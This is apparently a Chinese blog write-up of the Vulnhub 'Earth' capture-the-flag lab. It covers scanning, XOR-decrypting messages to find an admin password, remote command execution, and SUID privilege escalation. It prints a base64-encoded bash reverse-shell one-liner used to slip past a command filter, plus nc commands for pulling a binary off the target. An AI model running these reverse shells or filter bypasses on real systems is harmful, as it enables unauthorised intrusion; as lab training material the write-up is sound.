Vulnhub Earth

前言

vulnhub earth

https://www.vulnhub.com/entry/the-planets-earth,755/

靶机IP

1
192.168.56.111

信息收集

1
nmap -p- --min-rate 10000 192.168.56.111 -oN nmap/port.txt
1
2
3
4
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
1
nmap -sT -sC -sV -O -p22,80,443 192.168.56.111 -oN nmap/detail.txt 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_ssl-date: TLS randomness does not represent time
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Test Page for the HTTP Server on Fedora
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
MAC Address: 08:00:27:AB:7D:4B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (97%), OpenWrt 21.02 (Linux 5.4) (97%), Linux 4.19 (95%), Linux 6.0 (95%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (95%), Linux 5.4 - 5.10 (91%), Linux 2.6.32 (91%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

80,443端口开放但访问不了服务

ssl证书暴露了两个域名

1
earth.local terratest.earth.local

添加至hosts

1
192.168.56.111  earth.local terratest.earth.local

http://earth.local/

image-20260301204615586

http://terratest.earth.local/

image-20260301204640453

https://earth.local/

image-20260301204722887

https://terratest.earth.local/

image-20260301204749356

前三个页面一样,都是某种加密

异或解密

1
2
3
4
dirsearch -u http://earth.local/ -i 200,302,301 -e php,txt,js,bak,html
dirsearch -u https://earth.local/ -i 200,302,301 -e php,txt,js,bak,html
dirsearch -u http://terratest.earth.local/ -i 200,302,301 -e php,txt,js,bak,html
dirsearch -u https://terratest.earth.local/ -i 200,302,301 -e php,txt,js,bak,html

前三个只有登录框,https://terratest.earth.local/发现robots.txt文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
User-Agent: *
Disallow: /*.asp
Disallow: /*.aspx
Disallow: /*.bat
Disallow: /*.c
Disallow: /*.cfm
Disallow: /*.cgi
Disallow: /*.com
Disallow: /*.dll
Disallow: /*.exe
Disallow: /*.htm
Disallow: /*.html
Disallow: /*.inc
Disallow: /*.jhtml
Disallow: /*.jsa
Disallow: /*.json
Disallow: /*.jsp
Disallow: /*.log
Disallow: /*.mdb
Disallow: /*.nsf
Disallow: /*.php
Disallow: /*.phtml
Disallow: /*.pl
Disallow: /*.reg
Disallow: /*.sh
Disallow: /*.shtml
Disallow: /*.sql
Disallow: /*.txt
Disallow: /*.xml
Disallow: /testingnotes.*

最后一条/testingnotes.*,引起兴趣
拼接成/testingnotes.txt得到一段文本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.


测试安全消息系统笔记:
*使用异或加密作为算法,应该很安全,因为RSA中也用了它。
*地球(方)已确认收到我们发送的消息。
*使用了testdata.txt来测试加密。
*terra被用作管理门户的用户名。

待办事项:
*我们如何安全地向地球发送月度密钥?还是应该每周更换密钥?
*需要测试不同的密钥长度以防止暴力破解。密钥应该设置多长?
*需要改进消息界面和管理面板的界面,目前还非常基础。

加密方式为xor异或

登录用户名terra

testdata.txt保存测试数据

testdata.txt

1
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

并没有发现什么,获取这是密钥

写脚本,尝试解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
def xor_decrypt(hex_string, key_text):
    """
    使用密钥对十六进制字符串进行XOR解密
    """
    # 将十六进制字符串转换为字节
    cipher_bytes = bytes.fromhex(hex_string)
    
    # 将密钥文本转换为字节
    key_bytes = key_text.encode('utf-8')
    
    # 执行XOR解密
    decrypted_bytes = bytearray()
    for i in range(len(cipher_bytes)):
        # 循环使用密钥字节
        key_byte = key_bytes[i % len(key_bytes)]
        decrypted_bytes.append(cipher_bytes[i] ^ key_byte)
    
    return decrypted_bytes.decode('utf-8', errors='ignore')

def main():
    # 密钥文本
    key_text = """According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."""
    
    # 三段加密消息
    messages = [
        "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40",
        
        "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45",
        
        "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
    ]
    
    # 分别解密三段消息
    for i, msg in enumerate(messages, 1):
        try:
            decrypted = xor_decrypt(msg, key_text)
            print(f"=== 消息 {i} 解密结果 ===")
            print(decrypted)
            print("\n" + "="*50 + "\n")
        except Exception as e:
            print(f"解密消息 {i} 时出错: {e}")

if __name__ == "__main__":
    main()

解密得到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
=== 消息 1 解密结果 ===
vjh6qkxhl*o! radio.wcxrh.%fc&tl$+ytkor:cys7em=&r7_jg#nf(*Q`o#+Ngo7f ?M}|w$yIl&`! ~o-vxanc,'(--ck`z.#Q|cu k&*,8*~ta*#-nngc<o!np&C8iu+5i+bss}!md-.-D~f'd~lrg}&q!0O+`)R6rf( I~of~% rdl"{'`e="f{<`u-C/jubdt!mi#x{sty<g2/sn+`4}l.Hg?:}t-A<ln*7Jj7fsb,

==================================================

=== 消息 2 解密结果 ===
vwtqyn<dydr&9wnpu&l|fdm- }y"xv'&kbayp?crh7oz !d~e!n0.chbu%~d70K8bij%?|fzkoj:\z+'.82=&zchq;*|<d'r*lkn8)dg+cy=cdj "~ma 7hr|a~-* cuep-~qcLqq!n"e1zb6

==================================================

=== 消息 3 解密结果 ===
earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat

==================================================

前两段是乱码,只有第三段有数据,且重复,earthclimatechangebad4humans,猜测可能是刚刚得到的用户名的密码

1
terra:earthclimatechangebad4humans

登录成功,得到执行命令的输入框
image-20260301210627252

可以执行命令,但反弹不了shell,甚至出现和IP相关的都不行
image-20260301210824735

base加密后执行

1
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEwNy82NjY2IDA+JjE=" | base64 -d | bash

image-20260301211353454

二进制文件分析

1
find / -perm -4000 2>/dev/null

suid发现一个文件

/usr/bin/reset_root

执行失败

image-20260301211806748

下载到本地

1
2
3
4
5
靶机
nc 192.168.56.107 4444 < /usr/bin/reset_root

kali
nc -lvnp 4444 >reset_root

strace分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
┌──(root㉿kali)-[/home/kali/vulnhub/earth]
└─# strace ./reset_root
execve("./reset_root", ["./reset_root"], 0x7ffc75c39f70 /* 31 vars */) = 0
brk(NULL)                               = 0x395bc000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f432c389000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=96754, ...}) = 0
mmap(NULL, 96754, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f432c371000
close(3)                                = 0
openat(AT_FDCWD, "/usr/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0000\241\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 896, 64) = 896
fstat(3, {st_mode=S_IFREG|0755, st_size=2191896, ...}) = 0
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 896, 64) = 896
mmap(NULL, 2244176, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f432c000000
mmap(0x7f432c028000, 1462272, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x28000) = 0x7f432c028000
mmap(0x7f432c18d000, 540672, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x18d000) = 0x7f432c18d000
mmap(0x7f432c211000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x210000) = 0x7f432c211000
mmap(0x7f432c217000, 52816, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f432c217000
close(3)                                = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f432c36e000
arch_prctl(ARCH_SET_FS, 0x7f432c36e740) = 0
set_tid_address(0x7f432c36ea10)         = 90788
set_robust_list(0x7f432c36ea20, 24)     = 0
rseq(0x7f432c36e680, 0x20, 0, 0x53053053) = 0
mprotect(0x7f432c211000, 16384, PROT_READ) = 0
mprotect(0x403000, 4096, PROT_READ)     = 0
mprotect(0x7f432c3cc000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
getrandom("\x75\x38\xb3\xfd\x6f\x54\x58\xba", 8, GRND_NONBLOCK) = 8
munmap(0x7f432c371000, 96754)           = 0
fstat(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(0x88, 0x4), ...}) = 0
brk(NULL)                               = 0x395bc000
brk(0x395dd000)                         = 0x395dd000
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (No such file or directory)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
exit_group(0)                           = ?
+++ exited with 0 +++

提权

程序在 /dev/shm//tmp/ 目录下检查三个文件:

  1. /dev/shm/kHgTFI5G
  2. /dev/shm/Zw7bV9U5
  3. /tmp/kcM0Wewe

创建这三个文件并运行

image-20260301213043061

得到更改后的root密码

1
root:Earth

image-20260301213121478

得到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
              _-o#&&*''''?d:>b\_
          _o/"`''  '',, dMF9MMMMMHo_
       .o&#'        `"MbHMMMMMMMMMMMHo.
     .o"" '         vodM*$&&HMMMMMMMMMM?.
    ,'              $M&ood,~'`(&##MMMMMMH\
   /               ,MMMMMMM#b?#bobMMMMHMMML
  &              ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
 ?$.            :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
|               |MMMMMMMMMMMMMMMMMMMMbMH'   T,
$H#:            `*MMMMMMMMMMMMMMMMMMMMb#}'  `?
]MMH#             ""*""""*#MMMMMMMMMMMMM'    -
MMMMMb_                   |MMMMMMMMMMMP'     :
HMMMMMMMHo                 `MMMMMMMMMT       .
?MMMMMMMMP                  9MMMMMMMM}       -
-?MMMMMMM                  |MMMMMMMMM?,d-    '
 :|MMMMMM-                 `MMMMMMMT .M|.   :
  .9MMM[                    &MMMMM*' `'    .
   :9MMk                    `MMM#"        -
     &M}                     `          .-
      `&.                             .
        `~,   .                     ./
            . _                  .-
              '`--._,dd###pp=""'

Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
靶场
Vulnhub Earth
http://xiaowu5.cn/2026/03/01/Vulnhub-Earth/
作者
5
发布于
2026年3月1日
许可协议
BY XIAOWU